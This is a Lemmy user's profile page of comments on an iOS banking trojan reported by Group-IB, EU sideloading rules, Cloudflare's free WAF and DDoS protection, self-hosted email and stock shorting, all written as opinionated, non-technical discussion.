chiisana @ chiisana @lemmy.chiisana.net

Posts

4

Comments

500

Joined

2 yr. ago

Sure, but useless blog spam instead of linking directly to The Verge is a user problem, not a UI problem.

Lazy journalism. The two variants showcases exactly how iOS is more secure and how much harder it is to get on the device as well as attempt to extract info.

Few quick points to answer questions outlined here:

1. Android and iOS Variants behaves differently. Due to security measures (as outlined in this post itself) iOS variant cannot actually extract facial recognition data. Instead, it takes photos of user with prompts about shifting their face and blinking etc. The setup here is because Thailand’s central bank requires banks to perform facial recognition to withdraw larger sums of money. By stealing your face in multiple photos, they could build a deep fake of your face to be used in another device later.
2. Due to the way security works on iOS, the iOS variant cannot exfiltrate SMS messages directly. There is simply no permission to do such. Instead, it tricks users into installing a SMS filtering extension “to prevent fraudulent SMS” — this allows attacker to read incoming SMS, but only from unknown numbers. The hopes here is that they could intercept your MFA received via SMS at a later date.

If anyone wants to do the full reading, it is available from Group-ib directly.

And yes, this further cements my thoughts about EU making a terrible move forcing Apple to enable side loading as it adds additional vectors for bad actors to get into a currently much more secure and harder to invade device.

Let's park the specific geopolitical powers for a moment, because I cannot speak on behalf of countries and their intentions.

People are inherently different, and have different mindsets and believes. You and I clearly don't fully agree on whether or not iOS App Store should be opened up for example; and while our lack of alignments are fairly benign, there will always be entities on different ends of our own individual biased points of views. Some of these are relatively minor (like the App Store), others are far more significant (like privacy concerns). There are plenty of world powers that would prefer to have access to more private information, and they are, as of today, without third party App Stores, having a much harder time doing such on the Apple iOS ecosystem. This is because in order to run anything, you'd have to get through Apple's stringent review process, and while there are plenty of terrible things we'd like to see gone from the App Store, they've got years of experience in heuristic detection, are generally fairly good about detecting malicious apps, and can revoke notarization when something does slip through.

Now, a hypothetical world power with drastic different view than you or I (and we don't even have to agree with each other here) could start their own third party App Store, and bypass a lot of the checks and balances currently in place. "Don't install that app store, and don't install apps from it" is not an answer if they are in a position of power over you for whatever reason. I've called out a couple; maybe you need to pass through their country and their travel authorization at their airport is done via an app distributed only through their own app store; maybe you have family residing in such an area, and their only way to communicate with you is through a chat app through such an app store; etc. etc.

That is the problem this opens up. And while government entities have a lot of surveillance capability, they're not having a lot of success with modern day end-to-end encryption, which is why there's continuous legislative attempts against encryption while hiding behind the guise of child protection / anti-terrorism / national security / etc. etc., and the demand is often to have government known backdoors in the encryption -- I trust you're savvy enough to know how absurd that sounds that we don't need to go into detail here.

Everything that's came to light so far seems to create a net negative experience for vast majority of iOS users -- third party stores that peels away layers of security and losing ability to use PWA are just two casualties we've became aware of so far. The gong show will likely continue and we'll just have to wait to see what else comes to light as it further plays out.

It absolutely has happened on Android. The Russian government has launched their own app store, as an example of a state-owned-and-operated third party app store.

Additionally, once both iOS and Android are opened up, the capability to control the end-to-end distribution on both platforms simultaneously becomes a much larger incentive for major corporations; gone are the days where some users receives some features earlier because the other app store have not pushed the update yet -- they control it end-to-end.

I mean, I should be abundantly clear: simply operating a third party store does not equate to malicious intent. Some would argue the corporation case above could be considered beneficial for users. However, having third party stores with varying degree of security capabilities increases attack vectors for bad actors, and thereby making it more difficult for everyday users to manage -- an additional layer of complexity iOS users have not had to deal with for many years and very very few has signed up for.

There are plenty of apps people are forced to install; apps used for international airport entries, apps that’s used by everyone professionally, or worse yet, that one state-owned chat app grandma uses back home because everyone else uses it around her. All it take is one of them deciding they don’t want to be part of the strict review process and that their ability to further spy on their users are worth the core technology fee, and now people would be forced to use third party app stores with questionable review process. The “scare screen” before they add the third party App Store? That’s just going to be another thing users blindly click through due to notification fatigue.

At least for the time being, the current proposal put forth, Apple should still theoretically be able to revoke apps from third party app stores, and they still retain entitlement (sandbox/low level hardware access) signing rights. Once those checks and balances are taken away… then all hell breaks loose and those not super tech savvy (read: 99%+) will be hurt the most. At least I am comfortable enough to look out for myself 🤷

MFA or not, you can always social engineer people into getting access into their bank account. There's even SS7 attack for SMS based MFA. So, let's just abolish passwords and MFA all together and everyone hold hands to sing Kumbaya and be hippies together.... right? No, of course not. You do not weaken an established system because there's ways for bad actors to act maliciously. Vast majority of Apple users doesn't care for side loading and would benefit from the security that comes with the walled garden, very few Apple users (and the Lemmy user base does not a represent a statistically significantly broad representation of the user base) knows enough to care for otherwise, but are now getting dragged along for the ride.

I think the current proposed implementation would still allow Apple to revoke apps from third party stores, and they'd still control entitlements internally. Having said that, there's plenty of pushbacks already, and I haven't caught up as to whether or not EU approved their proposal yet. In all cases, as I said earlier, just like the cookie law and GDPR, the DMA maybe came from a good place with some good ideas, but the implementation is so broken, what companies will do to comply with the word of the law will be a gong show.

No. The law requires them to treat all browsers the same. If they allow it for Safari, they must implement API for all. Given the absolutely abysmal user base that actually uses PWAs, it’s no surprise they deprioritized that feature and just deprecate it for all.

Just like the cookie law and GDPR, the intention of DMA might be good but the implementation is going to create a gong show … and frankly I can’t wait for it to begin.

I honestly can’t wait for the gong show to begin.

Just like the cookie law and GDPR before it, the intention might be good, but the implementation is so botched that it’s just going to be a huge mess.

Hope a couple of emulators and porn apps will be worth it for those that advocated for this crap.

Didn’t they already did Mario 99 or whatever and then sunset it because it wasn’t successful like Tetris 99?

The biggest fear would be when you’re rebuilding, you’re putting extra stress on the other drives, thereby increasing the risk of them, too, dying.

On the product offering page for Free DDoS Web Protection, the features table shows that "Unmetered DDoS Protection" is available for everyone regardless of tier from Free all the way up to Enterprise. This change was rolled out on 2017-09-25, prior to this, there was a certain amount of throughput depending on price point (though, still very generous for the free tier from what I remembered).

Sometimes, people make up their mind about something and never update their knowledge, and it would appear this is one of those case here.

No problem! I appreciate the civil discussion! Thank you!

The free tier rolled out was specifically to address upstream vendors patching Log4J too slowly. They’re able to monitor the requests and intercept malicious patterns before it hits the server running unpatched (due to upstream unavailable yet) applications. They are updating with more rules for the free tier set as far as they’ve stated. The extras from paid tiers are more extra rulesets and more analytics around what was blocked etc.

At the end of the day though, you do you; the benefit for me may not be benefit for you. I’m not selling their service, and have no benefit what so ever should anyone opt into their services.

The difference in my opinion is that doesn't matter how fast upstream vendors patch issues, there's a window between issue being detected, patch being implemented, release getting pushed, notification of release gets received, and then finally update getting deployed. Whereas at least on cloud WAF front, they are able to look at requests across all sites, run analysis, and deploy instantly.

There is a free tier with their basic "Free managed ruleset", which they've deployed for everyone with orange cloud enabled when we saw the Log4J issue couple years back. This protection applies for all applications, not just the ones that were able to turn around quickly with a patch.

If you want more bells and whistles, there's a fee associated with it, and I understand having fees is not for everyone, though the price point is much lower -- you get some more WAF feature on the $25/mn ($20/mn amortized when paid annually) tier as well before having to fork out the full $250/mn ($200/mn when paid annually) tier. There's a documentation page on all the price points and rulesets available.

It’d be a challenge to keep up — 0 days aren’t going to be added to self hosted solution faster than they could be detected and deployed on a massively leveraged system. Economy of scales at full display.

Security.

Cloudflare handles a very large amount of traffic and sees many different types of attacks (thinks CSRF, injections, etc.). It is unlikely that you or me will be individually targeted, but drive-bys are a thing, and thanks to the amount of traffic they monitor, the WAF will more likely block out anything and patch before I’m able to update my apps on 0 days.

Also, while WAF is a paid feature, other free features, such as free DDOS attack protection, help prevent other attacks.

It’s a trade off, sure; they’re technically MITM’ing your traffic, but frankly, I don’t care. Much like no one cares to target/attack me individually, they aren’t going to look at my content individually.

Additionally, it also makes accessing things much easier. Also, it is much more likely I’d find a SME using Cloudflare than some janky custom self hosted tunnel setup. So from a using homelab as a learning for professional experience point of view, it is much more applicable as well.

Thanks for the thought! I’m that case, I’ll wait and implement this on Sublinks later instead. Thanks.

Self hosting email on non-mission critical domain for learning purposes might be okay if your intention is to get into the industry. Self hosting email for others on more production like setting you’re going to find yourself in a world of pain.

All it takes is one missed email (be it not making into their intended recipient’s inbox, or them not receiving an important notice in their inbox) and you’re never going to hear the end of it.

You’d also be liable for content your users send out from your servers — and I don’t mean the spam type, though if you get your IP blacklisted, your provider may want to have a word with you.

I’d strongly advise against going down this path, but if you do, be sure to have ways to legally shield yourself from any sort of potential liabilities.

Only if their DMM enables options. There are many stocks without options. In that case, the only alternative would be to borrow shares from your broker and sell those shares instead. You’d then have an actual short position that could be recalled by the lender.

Either ways, I’d probably not touch it. I wouldn’t want the theta burn or the risk of getting recalled while price actions tries to figure out a direction.